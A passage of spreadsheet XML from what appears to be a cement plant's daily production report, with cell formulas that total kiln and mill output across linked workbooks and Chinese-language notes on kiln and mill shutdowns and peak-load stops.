        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]18'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'17'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]18'!$L$15</f>
        <v>59335.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]18'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]18'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]18'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'17'!U44</f>
        <v>5257</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>70010.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]18'!$V$29</f>
        <v>291</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'17'!X44</f>
        <v>3338</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>69748</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]18'!$Y$29</f>
        <v>4218.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]18'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'17'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]18'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'17'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]18'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]18'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]18'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]18'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]18'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]18'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]18'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]18'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]18'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'17'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'17'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]18'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]18'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]18'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'17'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]18'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'17'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]18'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'17'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'17'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]18'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]18'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]18'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'17'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]18'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'17'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]18'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'17'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'17'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]18'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]18'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]18'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'17'!U48</f>
        <v>555.83</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6582.36</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]18'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'17'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]18'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'17'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'17'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]18'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]18'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]18'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'17'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]18'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'17'!X49</f>
        <v>143.06</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176673.4</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]18'!$Y$8</f>
        <v>10450.565</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'17'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'17'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]18'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]18'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]18'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'17'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]18'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'17'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]18'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]18'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]18'!$E$24</f>
        <v>1622</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'17'!H51</f>
        <v>77584.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1453983.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]18'!$I$24</f>
        <v>5376.891</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'17'!K51</f>
        <v>88688.642</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1451812.573</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]18'!$L$24</f>
        <v>37595.0419999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>83.5445377777774</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]18'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]18'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]18'!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'17'!U51</f>
        <v>3511.26</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>66509.731</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]18'!$V$30</f>
        <v>68</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'17'!X51</f>
        <v>3280.688</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>63896.925</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]18'!$Y$30</f>
        <v>3481.94600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]18'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]18'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'17'!H52</f>
        <v>384.86000000036</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383952.11</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]18'!$I$19</f>
        <v>1641.074</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'17'!K52</f>
        <v>73754.948</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1355449.148</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]18'!$L$19</f>
        <v>31676.3550000505</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>21.8457620690004</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'[13]18'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]18'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'17'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]18'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'17'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]18'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]18'!$M$21+'[14]18'!$M$22+'[14]18'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]18'!$N$21+'[14]18'!$N$22+'[14]18'!$N$35</f>
        <v>0</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'17'!U53</f>
        <v>924.05</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39258.477</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]18'!$Q$21+'[14]18'!$Q$22+'[14]18'!$Q$35</f>
        <v>0</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'17'!X53</f>
        <v>739</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40230</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]18'!$T$21+'[14]18'!$T$22+'[14]18'!$T$35</f>
        <v>1833.997</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]18'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'17'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]18'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'17'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]18'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]18'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]18'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]18'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'17'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]18'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'17'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]18'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]18'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'17'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]18'!$I$63</f>
        <v>446.574</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'17'!K55</f>
        <v>5032.263</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>40467.913</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]18'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]18'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]18'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]18'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]18'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]18'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]18'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]18'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]18'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'17'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'17'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]18'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：8:00-22:10避峰停机；2#磨：8:00-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：0:00-22:10续停。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G57+'17'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'17'!K57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G58+'17'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'17'!K58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G59+'17'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'17'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]18'!$Q$65</f>
        <v>窑:正常。A组磨：正常。D1#磨：8:00-16:00避峰停机，D2#磨：正常。</v>
      </c>
      <c r="R59" s="272"/>
      <c r="S59" s="272"/>
      <c r="T59" s="272"/>
      <c r="U59" s="272"/>
      <c r="V59" s="272"/>
      <c r="W59" s="272"/>
      <c r="X59" s="272"/>
      <c r="Y59" s="272"/>
      <c r="Z59" s="273"/>
    </row>
    <row r="60" ht="15.75" customHeight="1" spans="1:26">
      <c r="A60" s="191"/>
      <c r="B60" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C60" s="193"/>
      <c r="D60" s="193"/>
      <c r="E60" s="194"/>
      <c r="F60" s="194"/>
      <c r="G60" s="225"/>
      <c r="H60" s="194">
        <f>G60+'17'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'17'!K60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'[14]18'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]18'!$E$6</f>
        <v>4117</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'17'!H61</f>
        <v>66021</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1181894</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]18'!$E$21</f>
        <v>4889.4</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'17'!K61</f>
        <v>70889.38</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1172049.46</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]18'!$H$6</f>
        <v>32900.7899999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>63.2707499999998</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'[14]18'!$M$11+'[14]18'!$M$12+'[14]18'!$M$13+'[14]18'!$M$14+'[14]18'!$M$15+'[14]18'!$M$16+'[14]18'!$M$17+'[14]18'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]18'!$N$11+'[14]18'!$N$12+'[14]18'!$N$13+'[14]18'!$N$14+'[14]18'!$N$15+'[14]18'!$N$16+'[14]18'!$N$17+'[14]18'!$N$18</f>
        <v>3216</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'17'!H62</f>
        <v>50786</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>886779.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]18'!$Q$11+'[14]18'!$Q$12+'[14]18'!$Q$13+'[14]18'!$Q$14+'[14]18'!$Q$15+'[14]18'!$Q$16+'[14]18'!$Q$17+'[14]18'!$Q$18</f>
        <v>2965</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'17'!K62</f>
        <v>47536</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>882008.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]18'!$T$11+'[14]18'!$T$12+'[14]18'!$T$13+'[14]18'!$T$14+'[14]18'!$T$15+'[14]18'!$T$16+'[14]18'!$T$17+'[14]18'!$T$18</f>
        <v>21704.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>86.8185359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]18'!$Q$71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'[14]18'!$M$19+'[14]18'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]18'!$N$19+'[14]18'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'17'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]18'!$Q$19+'[14]18'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'17'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]18'!$T$19+'[14]18'!$T$20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G64+'17'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'17'!K64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G65+'17'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'17'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]18'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:14:30-24:00避峰停机。2#磨:0:00-24:00库满停机。3#磨:0:00-24:00库满停机。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G66+'17'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'17'!K66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G67+'17'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'17'!K67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'[15]18'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]18'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'17'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]18'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'17'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]18'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]18'!$Q$77</f>
